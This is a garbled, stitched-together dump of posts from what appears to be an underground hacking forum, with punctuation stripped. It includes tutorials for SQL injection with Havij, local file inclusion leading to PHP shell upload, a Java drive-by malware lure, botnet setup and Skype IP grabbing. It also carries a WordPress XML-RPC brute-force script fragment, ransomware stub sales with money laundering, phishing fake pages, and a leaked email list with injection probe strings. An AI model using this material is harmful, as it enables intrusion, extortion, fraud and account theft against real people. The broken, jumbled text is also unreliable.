hey guys today would sharing this email spoofer hide here keep the thread alive for password crypt dxd hide all credits crypt. 
the start looks good will try out. 
this far the best wifi packet sniffer the market. 
please follow instructions the text file the zip file. 
not update you will lose the liscence. 
tamosoft commview for wifi pro cracked. 
target suppliers chemicals lab chemicals acids solutions and solvents pass userid email haruspicerer orange. 
com sants getdown mytechnique yahoo. 
com dqeelb script alert script nisei kitsunegari. 
com bouf mnmesx ozbdkz. 
com cpytktv gsoygt pbopil. 
com cudky timfizell hotmail. 
com deciqit mikepilkington btinternet. 
com eusnxis stevenh btinternet. 
com haj purchase chempartsme. 
com hcpztof chris gmail. 
com icqziu mail claphamjoinery. 
iiajfwh chris ice cap. 
com iyrrjla nixubr rqlzhu. 
com kle hqs gdod mail. 
tst sleep limit kmkegh christom yahoo. 
com mja dnp peter thetutorsroup all nuhd. 
net ppqpwmv gecvar zvwgux. 
com pvnvcvu mitchvirgo gmail. 
com qwswnjk roger rkcreative. 
rvlv crooked hal yahoo. 
com tva tuy ali demir hotmail. 
com uioew eesy remember hotmail. 
com uqnhgnv shopmanager tallyhofarm. 
com wxtmmwg rossharper hotmail. 
com pyg seansullivan lineone. 
com dog jmafitzgerald yahoo. 
com zsidda lrmhattle talk. 
com xgucd pfnm uowmail. 
com litre jockcwm aol. 
com michelle hstinedurf yahoo. 
com cnhzsqg marcgcallaghan hotmail. 
com ctsq dhggh pillsviagra. 
com ecenm elipharma gmail. 
write emw qcc rgibson hyperlimeco. 
com epjmewx nkane msn. 
com evnq and ophbu email martyn harris. 
ganksok gemzdx matt northrop hotmail. 
com gmh nus nickworrall btopenworld. 
net jcgpu casarozo aol. 
com jfbtes techs nets. 
com lvhs example example. 
com jxwdq dmuhl richardson. 
ihi print acunetix wvs security test nepbgb bancroftpaul hotmail. 
com nlh gazbridge yahoo. 
com oczrgbg richardbruford yahoo. 
tst sleep limit oliverrees david. 
com qaz wsx jungleproject phreaker. 
net qrwp xss style xss xpression alert colin. 
hubbard btinternet smge nympy hotmail. 
com yaki tunednoise gmail. 
oww hopeflly this would work helpfull. 
crazymouse wrote hello today will show you how find the syntax used havij any other hacking tool what you need hacking tool will use havij this exemple but you can use whatever you like you can download here code. 
etg vulnerable website this exemple will use. 
let's start havij has open then run click debug program and select havij. 
exe and click attach and debug havij insert your vulnerable link and click start let run until it's idle check the log. 
yes you just found all the query used havij inject this website what's the point this most the time havij fails inject website cause cannot bypass lot security you can now modify the syntax you get succesful inject the website you want hacked this think very nice way learn manual sql injection and you will have all the exemple you need thanks crassus you copy please give crazymouse and crassus credit and credit the website too thank you. 
reupload pls images and. 
trial free version paid version. 
would like thank admin mods gvng dis space sharing knowledge. 
working firm where provided with net facility. 
some sites like facebook torrentz and porn sites are blocked. 
whenever try use torrent itz displaying dat sites restricted use. 
request how get over probs mainly wen had tried download movies thrgh utorrent dwnl unable start. 
plz kindly get rid probs bro's especially how start dwnlg movies thrgh utorrent. 
sorry forgot mention dat provided internet over proxy were individuals given separate user id's psw's. 
can help out over dis prob thanks advance. 
ran nmap and showed several ports open. 
this the cpanel login. 
hello today will show you how spread your rat server many people short time note this first ever thread please give some feedback how. 
thanks assuming you already know how setup rat and already have made your server not then this not for you but can make tut that also help you guys lets get started download link code. 
com fbz ibh dcx jmzg. 
hackers can someone help out removing bypassing wchms licensing code from website code php note i'm new this forum and this posting wrong place please move correct section. 
thanks for the share bro. 
big carders tool all accounts checker download here. 
lets see this then please. 
brute steam private cracker download here. 
ceztdb virus scan report clean. 
analysis contact pvtstuff ymail. 
and also etc passwd and etc shadow. 
zimbra wrote hello without bla bla let's start hack you'r friend facebook for exemple there are many way's today i'll explain how withe easy way think wil use the powerful web site fake page register and get link fake page facebook any other service url creat you'r one fake link url also use all the fake page get vip membre url hope you like see will like know this. 
new here and ready learn too. 
pls give link for this. 
will try and judge. 
checkout here thanks bro. 
nice thanks thanks god job. 
how set botnet with ufobot very simple likely the easiest way kali linux ubuntu. 
first download the zip from ufonet. 
net then extract your desktop. 
open your terminal and change directory desktop then ufobot desktop ufobot once you are the directory you can download the bots. 
ufobot download bots and you will have your botnet how ddos with ufobot the ufobot directory run the command. 
ufobot gui and will open iceweasel with your botnet control panel hope this worked for you have great day. 
don't get fool this one. 
was easy enough challenge. 
got the flag you have anything for clark wayne wrote all recently i've been participating local hacking challenge something similar the famous picoctf and although i've managed solve most the challenges there are few that still evade. 
zimbra wrote hello without bla bla let's start dthanks for sharing bro hack you'r friend facebook for exemple there are many way's today i'll explain how withe easy way think wil use the powerful web site fake page register and get link fake page facebook any other service url creat you'r one fake link url also use all the fake page get vip membre url hope you like see zimbra wrote hello without bla bla let's start dthanks for sharing bro hack you'r friend facebook for exemple there are many way's today i'll explain how withe easy way think wil use the powerful web site fake page register and get link fake page facebook any other service url creat you'r one fake link url also use all the fake page get vip membre url hope you like see. 
offering service build fud bitcoin ransomware stub and launder the coins you get through the software you will receive the stub. 
bitcoin addresses that you can check for balance these addresses will your stub program automatically check how much balance those addresses license key and custom link request your payments the pricing receive the stub but also charge fee any ransoms sent the addresses sent you. 
can use escrow service use official middleman your choice. 
don't want pay you can purchase stub package where you create the bitcoin addresses and private keys and will build stub with those addresses. 
there will way touching the btc and will your job launder the money safely. 
this package costs and will include any updates the stub stops working. 
after payment has been sent you accept that have maximum hours have one one talk with you and let you view computer via. 
watch build your stub you wish purchase stub and receive instantly via email you can the link here. 
this will updated you will receive stub pre made with addresses attached depending the package you select. 
online during the hours gmt mon sun that would the best time contact you will able watch build your stub and view the btc addresses added you not receive the btc source code you only receive the stub. 
exe please admin could contact will happy prove the program legitimate. 
the amount addresses you need will depend the amount people you plan infect. 
more people more addresses please request more you plan spread masse. 
goes for efforts making the program goes the launder service use. 
faq but how get money you have refreshed your address checker find amount btc available one your addresses simply website enter your license key the address you want the funds sent and the address with the bitcoin. 
then your btc will sent within hours website will sent upon purchase. 
you purchased the private package into the work folder and there will text file called. 
txt open that and find the matching private key. 
txt how know you're not going add secret code into the stub and use your bitcoin addresses you can view all the code over join. 
when build your stub what have will give you config file edit and tell you which lines edit. 
this includes how much the ransom will. 
okay great i've got stub but just ran accident what you pay the ransom there's other way unencrypt your files you accidentally run the file you can contact and will send your money back you. 
the fee mandatory for any transactions all funds must laundered. 
how spread you use your imagination spread forums buy bots youtube videos etc etc. 
won't help you spread that your job not ask for help spreading how contact you jabber jamesbrooks xmpp. 
only contact via jabber not use skype icq any other chat messenger. 
not hire care hirethehacker. 
com details here's their details for western union first name konda second name suresh state tamil nadu country india see all evidence and their shocking emails here scammers. 
all download link not working. 
hello all urgent need remote keylogger. 
lovely have definitely must have this. 
actual offer for all. 
the archive available for download contains program that will circunvent filters. 
can have the authentication code. 
think this wonder works. 
trojan dont downloaded information process name dllhost. 
exe domain host droid. 
net port remote address. 
process path windows system dllhost. 
thanks lot for posting this really need zeus. 
pratham wrote nice tut. 
did really work tks. 
you are the best and very good. 
thanks for this man. 
cracked server login again. 
don't really know what else. 
anyone want have fun guest. 
thanks but can you explain more clearly. 
you can download from here for free solboy wrote cybdom wrote this modified version the famous botnet zeus. 
can bypass injecting shell image using edjpgcom download you need image. 
many php tutorials like this one say getimagesize secure and many websites use. 
thx for sharing postt. 
this works i'm gonna happy man. 
thank you for your sharing will try later. 
hope its works lets give try. 
thank's bro nice share from you tike saha weld blad nechalahe maykounshe zombie lol. 
requires the placement our ads the forums. 
hello can ask what other way buy credit for skype. 
have credit card but skype need ssn. 
dont have ssn how can other option get credit for skype. 
coz need subscribe make call thanks codefire wrote skype resolver api setup these are instructions for setting the skype resolver api windows vps from scratch deadcode. 
thx you have look the link url want answers pls. 
deland united states checked socks. 
oxford united states checked socks. 
hampton united states checked socks. 
los angeles unknown united states checked socks. 
san angelo unknown united states checked socks. 
reserve united states checked socks. 
rocklin united states checked socks. 
appleton united states checked socks. 
petersburg united states checked socks. 
york haven united states checked socks. 
canfield united states checked socks. 
plain city united states checked socks. 
can't wait check out. 
think makers idm are chutiya. 
thanks idm makers thnx you really appreciate their work then please buy this software that they can earn something just don't cool. 
thanks and let's hope that backdoored. 
which method bro kindly share with. 
shell moshkela break the protection server shell breaking protect the server and pull config server for grabbing some pictures shell user admin pass download. 
net downloadf apu zip. 
enjoy first skip the add than enjoy those pass username info please. 
cheers mike nice job thx bro. 
online after many days thanks link not working. 
i've been lookin for one these piss bitch ass dealer off. 
nice bro which tool use. 
oberosterreich austria blacklist yes checked. 
japan blacklist yes checked. 
new jersey united states blacklist yes checked. 
zuviobaba wrote bro interested the mailer. 
prathamhi wrote gud post. 
south africa blacklist checked. 
texas united states blacklist yes checked. 
thanks for the update. 
rio grande sul unknow. 
indiana united states blacklist checked. 
mexico blacklist yes checked. 
thanks for the tool and dork. 
need try before confirming. 
very good thanks bro. 
ohio united states blacklist yes checked. 
hope this still works imma gonna give try. 
pls need working for network here's network name 'mtn nigeria access ponit web. 
will grateful for your help. 
painkiller wrote brute steam private cracker download here url virus scan report clean url contact pvtstuff ymail. 
com painkiller wrote brute steam private cracker download here url virus scan report clean url bhgg dhb vjh contact pvtstuff ymail. 
qrab thanks wrote new priv mailer inbox. 
thanks bro very much. 
why every one need reply you cant even see the real posts. 
com rar ndoapba webr. 
com webr i'm glad you commented use. 
gonna try her out. 
ound this deepweb password scamleaker hidden content you must reply see links hidden content you must reply see links download hidden content you must reply see links. 
please need old gmail and password can someone help new here. 
seems pretty fake lmao. 
thanks for this premium account. 
very nice job and share thank you very much bro. 
great share man very much. 
dracohacker wrote good job. 
local file inclusion very popular web application attack was very common few years back. 
however now days you will rarely find websites vulnerable this attack. 
however single vulnerability can result getting your website compromised. 
have already written article directory transversal attack. 
therefore believe that need details about the attack. 
you might know avinash now the author the previous article how hackers are hacking into websites shared hosts. 
however this article will demonstrate local file inclusion vulnerability and will enhance the attack uploading shell the website. 
here are some the common parameters which are vulnerable local file inclusion remote file inclusion attacks. 
php index requirements vulnerable website remote shell. 
txt user agent switcher. 
switcher mozilla firefox the first thing which hacker will while finding lfi vulnerability locate the etc passwd file. 
this file indicates that local file inclusion vulnerability present the website. 
the image below explains the whole story root the username followed which happens the password however here shadowed which means that present etc shadow file. 
which only accessible when you have root privileges. 
next the hacker will check for proc self environ. 
change your path proc self environ. 
the proc self environ page should look something like this the file exists not all sites have. 
once the local file inclusion vulnerability has been identified the hacker will try perform remote code execution and try some how further. 
this can done uploading php backdoor. 
for that purpose commonly used tool useragent switcher. 
which can downloaded from the link above. 
the hacker edits the useragent and changes code inside the user agent the following select your user agent tools default user agent php info whatever you user agent called after refreshing the website then searches for the keyword disable functions ctrl search function disable functions value value the above function tells that website vulnerable remote code execution and now can upload the php backdoor. 
the finding that the website vulnerable then tries upload the shell using the following command where the above code uploads php backdoor text form and later renames. 
now the shell has been successfully uploaded. 
once the php backdoor has been uploaded will look like the following thanks. 
sruthy wrote this tutorial shows you how upload your shell. 
requirements firefox browser http live header firefox addon click here shell. 
just copy and paste google got this website now are going browse for 'up. 
was gonna forget tools for the. 
doesn't work need mailer. 
take you share glory bro. 
user the best pass premium login. 
com the account not working dont change the password. 
thx for the info cheers. 
this was awesome mate thanks. 
these files are longer available. 
hope this will still work. 
application portuguese but the english translation has already started manual hacker free url manual hacker gold url merci partage. 
thanks for sharing with the community dude. 
this not mine just sharing. 
net framework you will need that installed your computer for the program work. 
jpg how use you not already have file with filenames this the usual scenario. 
type the page into the pageid field. 
com gag then the page gag. 
click retrieve album list. 
this retrieves list album names from the server and populates the drop down menu below. 
select the album you wish download images from. 
for example wall photos. 
click the browse button navigate the folder you wish save the images. 
this path will shown the save text box. 
click scrape filenames into text file. 
this will download list filenames into text file that the same name the page. 
the example would gag. 
txt and would saved the folder that you specified. 
now that you have list image filenames you can click download images from album. 
the images will now download keep eye the status area the program see when the downloads have finished. 
you already have list filenames possibly from another source from scraping earlier. 
the bottom right hand side the window select browse and load file. 
select file that contains list images download. 
click download images from album and the images will download. 
lets check need something for skype cam view. 
kya reply karun dhkns. 
bro interested the mailer can you send via email zuviobaba gmail. 
come fast baby need see. 
tupac crypter download here. 
thats good poste its friend friend have you exploit pdf exe fud and not rilevale. 
tnx for sharing gonna try tnx for sharing. 
amazing bro but the site offline. 
hey all this hack still working. 
have some doubt can your email address thnx. 
color ffd about color use platinum hide keep your real address hidden surf anonymously secure all the protocols your provide full encryption your activity while working internet and much more. 
hope this not infected. 
want try for self might get lucky. 
twitter adress and phone link link. 
article spinner seo software for your articles any kind writing that needs spun. 
simply install and copy the contents the crack folder the article spinner install directory. 
sometimes doesn get the job done you should definately check your article before you post anywhere because who knows how good the spin will. 
might not that good spinner but you try out. 
com file befed fee aea cad analysis code. 
features connects through proxy account won't get disabled tutorial built into the program. 
noob wrote interesting this sounds and from reading you have put inplace that been decentralized this very method will have particalar aim because you could never anticipate the very side were the binary code hex encoded other words will run. 
hektor wrote give your shell upload self. 
thanks man like lot. 
torrents and the bittorrentfile distribution system has become extremely popular these days and has become one the most popular mediums for downloading files off the internet. 
you not already know torrent file type computer file that contains metadata about files and folders which shared and distributed large network computers known trackers. 
you can refer this link for more information about torrents. 
there are various torrent clients used download files from this network and the most popular ones are some users while downloading files using torrent clients experience slow downloads which can often caused incorrect configuration settings the router firewall the system. 
tinkering with the configuration settings for bit you can easily increase your torrent download speed and enjoy fast download. 
below showing you couple methods and tips you can use increase torrent performance your. 
throughout this guide using utorrent test and configure advised you use utorrent too. 
configuring utorrent for maximum speed and efficiency first will changing some inbuilt settings utorrent increase the performance. 
for that first need know our connection upload speed. 
simple way that visiting website called speedtest. 
the website lets you easily calculate your connection quality the upload and download speed. 
now you see something like the picture above. 
you need click the begin test start measuring your network speed. 
make sure you pause all your ongoing downloads other pages that uses your bandwidth before you click begin test. 
this important get the right speed your internet. 
once you done you see something like this picture above. 
your download speed and upload speed depends entirely your connection might vary lot. 
but what you need the upload speed which. 
mbps the above case. 
will need this value later. 
either note this value down just remember. 
now can move onto the next step which calculating the values for configuring utorrent. 
once you got your upload speed need another website get the correct values for the configuration settings utorrent. 
the website use azureus upload settings calculator. 
html visit the website. 
now you will see something like this color now believe you seen two boxes the top where you can enter your upload speed either kilobit second kilobyte second. 
now you know your speed was displayed megabits second need convert kilobits second. 
that simply multiply your upload speed with. 
alternately you can use website like convertunits convert mbps kbps. 
color now what you need enter this value the respective field our azureus webpage and get the results. 
soon you fill this upload speed the website the remaining columns will auto filled with values values that you enter utorrent optimize. 
here how look like once you entered the value into the box. 
please know that the values you get entering your upload speed will different from mine and you have use the values which you get proceed the further steps. 
these are the values will using optimize utorrent. 
make sure you not close this page since require these values for the upcoming steps. 
once you got the values are proceeding the next step which assigning the optimized values the utorrent configuration settings. 
for that first open utorrent. 
once you done that click options preferences. 
once the preferences window has opened need fill the values. 
for that click the bandwidth color tab the left pane and fill the values into the respective columns like this now head the queuing tab from the left pane and fill the rest the values like this yeah you all done. 
now you actually optimized your utorrent configuration settings suit your internet connection and your. 
unlike other tutorials which promise you speed increase this actual working method which you can try and use your. 
now successfully covered the first part this tutorial. 
the next part tinker bit more and utilize something called ports and learn how can really help increase your utorrent speed. 
optimizing ports increase download speed once configured the upload settings time optimize our ports. 
you know nothing about ports port network resource that your torrent client uses allow other systems the network access your. 
all the ports have unique numbers like which are known tcp port number. 
when other systems try access your they through some random ports. 
suppose they trying access port number and your ports are closed blocked they won able access your and stops connections your and thereby decrease your download speed. 
you need forwarded ports have maximum connections the network and get maximum download speed. 
will learning how open ports and enable others establish connection your. 
first what you need disable any firewalls your. 
you have firewall antivirus program installed will block incoming connections thereby decreasing your download speed. 
you need disable any firewalls antivirus programs your. 
alternatively you can add exception for your utorrent client the firewall too. 
this will have the same effect. 
now need forward particular port. 
now there are specific instructions how forward port your. 
completely depends what type and brand router you got. 
the settings will completely vary and overcome this difficulty will using website named url. 
com portforward once you entered the website you see two boxes where you can choose your router brand and your router model and then the website will give you specific instructions forward port for particular application your. 
specify the brand and model and then choose utorrent from the list applications forward. 
now you see specific instructions just for you like this now once you followed all the steps time check whether you successfully forwarded the port. 
this ensures you done all the steps right and you ready use the port. 
for that will visiting the website. 
when you the website enter the port which you forwarded and click check your port know whether you done right. 
yes the website will say you successfully forwarded. 
else will pop error which case you repeat the steps and rectify. 
that you successfully optimized your utorrent for maximum download speed. 
all your downloads will much faster from now and you having lots connections from your making even better. 
you followed this guide can guarantee you now got faster download speed. 
that sums for this tutorial. 
not founder this detail. 
got this detail from another site. 
blazelord wrote about skype deob deobfuscated old version skype which doesn't encrypt any logs. 
therefore will show the decrypted someone you're speaking very easily. 
the method step one credits this isn't method nor download link. 
this public but there's still many people asking for this this section. 
got something wrong don't roast. 
credits the owner for the download links. 
jameswang wrote nice share. 
thanks you your welcome need help. 
thank's i'ts very good wtf dont work link. 
thanks for your job. 
god can any one tell how crack hash only one file others all virus. 
says suppose reply this post. 
genio muy bueno very good. 
need use this for some penetration testing own site. 
this very good post. 
thanks for share this tool. 
madscan exploit scanner for joomla and wordpress. 
for run this tool download link click here virus scan report click here. 
you can download from here for free thanks for the great work mehn. 
the script don't work. 
need this now let see the website down. 
free direct admin page finder php. 
unuc pass pvttool leave reply keep this thread alive you want. 
about skype deob deobfuscated old version skype which doesn't encrypt any logs. 
the method step one hide first you're going need download these files from here. 
step two after you've downloaded everything. 
open the version skype that you just downloaded and select contact that you want get the. 
would easier you knew what country they're from but you don't have. 
step three now open smssniffer and ipnetinfo. 
now you need start capturing packets from your victim. 
this you should start capturing smssniffer then send them quick message skype and now click the next the call button skype and over connection and watch the arrows roll circle. 
step four when the arrows stop rolling. 
stop capturing packets and where all the ips you collected. 
click one then press ctrl select all them then ctrl copy. 
step five paste into the ipnetinfo. 
you are going need know common isps for this. 
for example says 'comcast' then you know it's their they're the usa and washington for example. 
you can use this method anyone. 
don't want vulnerable this well simple. 
just use the web skype use skype rdp server. 
hide credits this isn't method nor download link. 
credits the owner predator. 
wtf for the download links. 
try out asap wrote platinum hide. 
troxy wrote there methode bruteforce attack you try thousand passwords and one them should match but this take too long i'm willing try anything get account back. 
omg thanksomg thanksomg thanksomg thanksomg thanks. 
can repost the link plz. 
and thanks for this method. 
hope would work sounds cool. 
open notepad method bat program type start goto save. 
bat copy and paste users local appdata microsoft windows startmenu startup applications will execute startup result system shutdown method vbscript open notepad type save. 
vbs method unix linux open shell type. 
blazelord wrote very easy method btc more working june you can instantly cash out and very easy earn this not gambling anything like enjoy. 
you will need black hat hacker for that. 
white hat hacker sorry. 
don't dip illegal things. 
need the links for the thread. 
hider pro hider pro professional software used tohide your address that you can hide your internet traffic and the real location while surfing the web. 
the best changer software makes nobody know what you the internet. 
hider pro provides government level safety factor you are assured freedom anywhere the web without worrying about any the information leaked. 
run hider pro crack. 
wait till messagee pops click. 
nice thanks for sharing. 
hello everyone could you please hack this instagram account. 
email the details bananamuffin gmail. 
com and will make worth your while. 
painkiller wrote introduction ghost eye fast hack program with alot features like strong denial service attack dos attack crypter file binder fast smtp mail sender website resolver skype resolver checker tracer with alot features live chat and alot other features that will help you ghost eye was coded hisoka ismael from morocco remember hisoka not responsable for the use this product it's for educational purposes only. 
ghost eye pictures for the virus scan don't know why they give but can guarante that this software clean you virus scan url download just post here keep the theart alive and i'll you the link please don't. 
video note i'm working hard now make fud crypter and give for free the free crypter like url url url. 
thanks man hope the link working link not working please share another link. 
thanks man i'll see this good booter. 
let try this shit. 
let start the engine and race dirt track. 
nothing works here but. 
coindaylol wrote found this thread another hidden network onion net. 
send sms and call pranks any number good job. 
working for the first time with facebook api. 
insertbefore ref document any other query refer. 
tirth wrote how this with protocol how that. 
thanx bro nice shell what working. 
thank you bro let try out. 
what have here bro. 
haxor wrote found this tool free version. 
excuse how would find the destination directory image. 
azag wrote present you blackw the worm has lots options very easy configure like rat but with lot more options let you discover you even through its screens font color installation tutorial necessary the worm server can encrypted using the tools available the forum color. 
scan antivirus virus total url. 
looks good thanks for the share. 
hho oho ooy hihui iuhhu ihu. 
how many people believe modi who are muslims was reading upon the distractions has created for other religious people who aren't hindus and destroying their temple mosque whatever people call. 
good man will never that. 
just thought not insult please don't take heart but rather see things from everyone's prospective this way everyone will see care for each other and not let the government divide people based the religion. 
politics politics don't fool and protect all humans regardless their religious beliefs. 
who are you fighting for the gov. 
rar password vipunderground download url hanks. 
greats thanks will try out. 
botnet's rat keyloggers formgrabbers set service available. 
botnet set service for hacking bank logins paypal accounts email's and passwords cvv and fullz. 
rats set service for hacking bank logins paypal accounts email's and passwords cvv and fullz keyloggers set service for hacking bank logins paypal accounts email's and passwords cvv fullz formgrabbers best for hacking and email passwords all kind for alibaba and wire transfer including paypal accounts. 
icq skype varenkovic yahoo messenger hacktools yahoo. 
fairfax unknown united states checked socks. 
coupeville united states checked socks. 
granite bay united states checked socks. 
east wenatchee united states checked socks. 
unknown unknown unknown bulgaria checked socks. 
unknown unknown unknown brazil checked socks. 
acopiara unknown brazil checked socks. 
unknown unknown unknown canada checked socks. 
red deer unknown canada checked socks. 
taipei unknown taiwan checked socks. 
ponoka unknown canada checked socks. 
campbell river unknown canada checked socks. 
vancouver canada checked socks. 
seattle united states checked socks. 
district columbia united states blacklist checked. 
slovakia blacklist yes checked. 
minas gerais brazil blacklist yes checked. 
rafiqctg wrote friends enjoy dont change password url nice share. 
you use this and helped please leave comment saying was looking how create java driveby and couldn't find any good tutorials how. 
spent few hours looking around other websites until collected all the information needed make one. 
now sharing that information with hackforums for free this driveby will fud long your virus fud. 
here how create java driveby step download all the files you need from here. 
ppdklj step you will need make your own html code put the driveby steal another websites html use the cam site template html that included. 
step you stole made your own html code for the website paste the html code below the existing code the index. 
html the first folder. 
should look like this step you used the template take the java. 
gif and place them the template file. 
step rename your virus. 
exe make less suspicious and then upload the java. 
exe website where you can get direct download link. 
used mediafire because virus fud doesn't get picked its virus scan take that direct download link and paste into the part the applet text that says direct download link virus here like step now you are going need web host. 
com mine but you can basically use whatever you want. 
note this tutorial assuming you know how webhost works and how ftp file transfer. 
there are plenty tutorials out there and this creating java driveby tutorial not web development tutorial apologize. 
step use ftp file transfer either add all your files the webhost all the template files the webhost. 
step everything has been done correctly. 
com and you should get screen that looks like this with your website also used blank template for this picture step share your website with people and when they click run this time always run this site they will get another popup asking they are sure and lets face they will more than likely click continue. 
know this short and simple tutorial missed anything this tutorial please let know you have suggestions how improve also let know feel free questions leave them the comments below for myself and other hackforums members answer. 
thanks and have good day. 
like try this this tutorial like spreading tutorial way basically. 
make see this bombo clark run tinz here. 
wow this great thanks. 
hacked server with some odd websites. 
php action add item qty. 
asp seccion visor noticias. 
thanks man been needing these. 
com bulgaria blacklist yes checked. 
andhra pradesh india blacklist yes checked. 
hayalet tracer dos crypter daha bir. 
bourdj wrote you have look the link url want answers pls bourdj wrote you have look the link url want answers pls. 
finally found this rat its does not required port forward router upnp port forward many user cant forward their port for rat setup because restricted network firewall router deos not allow but dont worry here solution. 
its only required freevpn services like ipjtable vpn proxpn vpn something else and this rat has also vpn section added where can put vpn details and connect vpn will automatically forward port want buy then drop mail email hide ddebug gmail. 
after getting directed least sites the download file doesn't work. 
don't waste your time. 
dear forum community let introduce you our cloud based project which can help you pentest your own network. 
with this online application you can crack your own router's wireless password. 
are using several dictionaries the moment including language files common passwords dates numbers etc and you only have pay the passphrase was found. 
the cracking process free case passphrase. 
png please leave feedback you are satisfied not sincerely eaves. 
med bad boy wrote yes man. 
tamper data very important bro can you help spamming. 
thanks for this ill try out. 
com jki tpg file. 
all very new this world and have very little knowledge the matter need help with very urgent and was hoping find least one person who will understand and help there twitter account that has caused lot harm and abuse this account has since been deactivated. 
there any way find the address thus location details the person. 
please let know you can help. 
com and search this dork. 
inurl ckfinder intext ckfinder. 
html intitle index ckfinder. 
now click resualt like this url target. 
com ckfinder example hidden content you must reply see links. 
html file example url after click hidden content you must reply see links now you can see nice file manager. 
click the upload button and browse your file for upload. 
note most targets dont allow upload php files. 
but you can upload txt pdf and also images. 
for shell uploading you can rename file like below examples shell. 
gif use tamper data live http header thanks for reading credit. 
missouri united states blacklist yes checked. 
gauteng south africa blacklist yes checked. 
checkout here bitshacking com forum black hat money making hot bitcoin stealer now make thousand money easily. 
html thanks and just let this bot your side bots make much usd. 
this the date version utorrent pro. 
used download torrents anonymous and has many more cool features. 
must have program for everyone. 
thank you for video tutorial. 
will try this after learning. 
lets see working method just another time waster. 
how download the file. 
great post love tha type info. 
thank bro for the info. 
sweden blacklist yes checked. 
thanks gesendet von meinem xperia ultra mit tapatalk. 
you see good see you too. 
unknow unknow tor relay. 
net anonymous proxy blacklist yes checked. 
thanks lot mate thank. 
gut gesendet von meinem xperia ultra mit tapatalk. 
united kingdom blacklist yes checked. 
will come back does. 
here awesome search engine that anyone here should use. 
shodan map interactive search engine that shows the location every device directly connected the internet. 
com anonymous proxy blacklist yes checked. 
unknow unknow anonymous proxy blacklist yes checked. 
arad romania blacklist checked. 
post ransomware source code completely customizable ransomware source code completely customizable this source code completely customizable. 
input your own panel design your own wallet addresses and your own extensions crypted. 
below have list extension which are already the software. 
you notice alot them are from accounting softwares since plan send accounting companies. 
all the common extension are there. 
you can design your own custom panel jpg and you input the text you want the victim read. 
you set your own price usa dollars. 
use panel with porn image stress the victim out. 
the software will randomly delete one file per hour default. 
you set the delete value true. 
the victim will see the timer. 
you can change delete more zero. 
the software comes with fud crypter keep fud. 
selling the code and full solution for people only keep away from companies. 
you are interested send message. 
can payivy instant payment. 
although very simple customize will available for support you need. 
you need visual studio which you can get for free online. 
thanx will try this. 
this based any the other older families. 
thanks will see works. 
thanks for the upload. 
thnx bro this helps alot. 
this method pretty primitive but sometimes works. 
san diego united states checked socks. 
harlingen united states checked socks. 
richford united states checked socks. 
kahului unknown united states checked socks. 
saint louis united states checked socks. 
milpitas united states checked socks. 
sidney united states checked socks. 
chandler unknown united states checked socks. 
concord united states checked socks. 
sarasota united states checked socks. 
phoenix unknown united states checked socks. 
central united states checked socks. 
final series abilities shells private and powerful tcp udp high power better then paid booters web booting xfire booting xbl booting gameranger booting garena booting cod booting minecraft booting alter revo booting screenshot virus scan metascan. 
detection ratio anon shell booter. 
more power better gui final release. 
test out and give feedback. 
download link here code. 
bla bhla bla sent from using tapatalk. 
freeza wrote thanks fucker will the shit. 
nice software and also includes guide for how use. 
arizona united states blacklist checked. 
net venezuela blacklist yes checked. 
net india blacklist yes checked. 
unknow unknow russian federation blacklist yes checked. 
unknow unknow niger blacklist yes checked. 
start going here download. 
com pjc csdmbp gce easy money bitcoin mining triplemining guide pics. 
zip rghost file sharing you will want install this and put somewhere you can access again run guiminer the folder and you should see something like this size large will now make new miner you got message saying open devices you need update your drivers for your grapgics card. 
will try this out. 
can't wait give this shot thanks. 
distrito especial unknow azteca comunicaciones. 
com colombia blacklist yes checked. 
cool post pls anybody know how hack aliexpress asap let's team have tools make money with database info. 
just copy and paste google got this website url now are going browse for 'up. 
was gonna forget tools url for the. 
nuevo leon mexico blacklist checked. 
'vivs 'ka oblast unknow sol fttb. 
kentucky united states blacklist checked. 
hello mates today sharing you dollar per day method completely fresh and private tutorial and work like charm tried self and looks great. 
believe sharing caring thats why sharing this method with all you this method black hat but not illegal checkout here. 
com forum simple money making methods best money making guide per day guaranteed only steps. 
html enjoy the leak and make money easily spending short time regards. 
have just set wireless connection home whenever log says that the connection unsecure how secure have new toshiba laptop and phillips router. 
saw something about wep key. 
where enter this you are right worry about this problem actually because any open wireless network invitation for neighbors and various unsavory characters connect your network they were your local area network. 
this means that they'd able use your network friendly printer your networked hard drive backup system and try break into your computers too. 
addition they'd able use your network connection itself and they were download tons illegal music for example the could get your isp shut you down they downloaded porn terrorism research data well the fbi could get involved. 
not good fortunately it's pretty easy secure wireless network system you need log your router base station your phillips unit which probably done simply entering special address your web browser try. 
the documentation that was included with the router doesn't explain. 
that fails you might need hook the router directly the computer via usb cable though those are definitely rare systems. 
once you've hooked you should find multi tab configuration tool that has one tab labeled security similar. 
click that and you should able find password option button. 
click that and should give the options wep wpa. 
recommend that you choose wpa and use long password it's far more secure than wep. 
here's example from the configuration screen linksys router you can see it's bit complicated but once you enter password automatically generates all the scary looking hexidecimal security codes any those will what you would enter your toshiba laptop once securely connected forever. 
hope that helps you get your hatches battened down. 
how use ytto send multiple just choose another prank and enter the number. 
code usr bin php tutmoses usage php xml rpc. 
php target xml rpc path user password list' isset argv argv argv argv echo banner target argv xml rpc path argv username argv password list argv use the value current iteracy loop set ramsees sphinx. 
getusersblogs lines file password list foreach lines line echo nattacking. 
attempting brute force through xml rpc interface curl init curl setopt curlopt returntransfer curl setopt curlopt url curl setopt curlopt useragent mozilla. 
curl setopt curlopt post curl setopt curlopt postfields. 
encoding iso set ramsees sphinx username line curl setopt curlopt timeout curl setopt curlopt low speed limit curl setopt curlopt low speed time curl setopt curlopt cookiejar tmp cookie target buf curl exec curl close unset preg match isadmin buf matches echo admin account bruted. 
line else preg match faultcode buf matches echo error error occured. 
account may not been bruted. 
else echo banner not sure how well this works havent really tried more theory give shot use php cli. 
thank you very much for the share. 
bro have can you help with the kit can set for myself. 
net hungary blacklist yes checked. 
rafiqctg dance tanks wrote today here with bumper collection. 
are you still active with this service let's see. 
will test thank advanced. 
thanks this very good share edit survey. 
very good support very good support very good support very good support very good support very good support. 
too please any one help top get. 
net spain blacklist checked. 
have searched high and low for real free vpn service stay anonymous online. 
download installer here download. 
can share maybe some friends can wankstar lmao. 
hello everyone would like people give more details and examples what proxies and socks are and what they are used for also how use them. 
pennsylvania united states blacklist yes checked. 
norfolk united kingdom blacklist yes checked. 
makes the job easier. 
com singapore blacklist yes checked. 
thank you much dude. 
explain the trick achieve this. 
vulnalizer premium bot bot written python all you need the the server you wish attack. 
easy use compact and works extremely fast. 
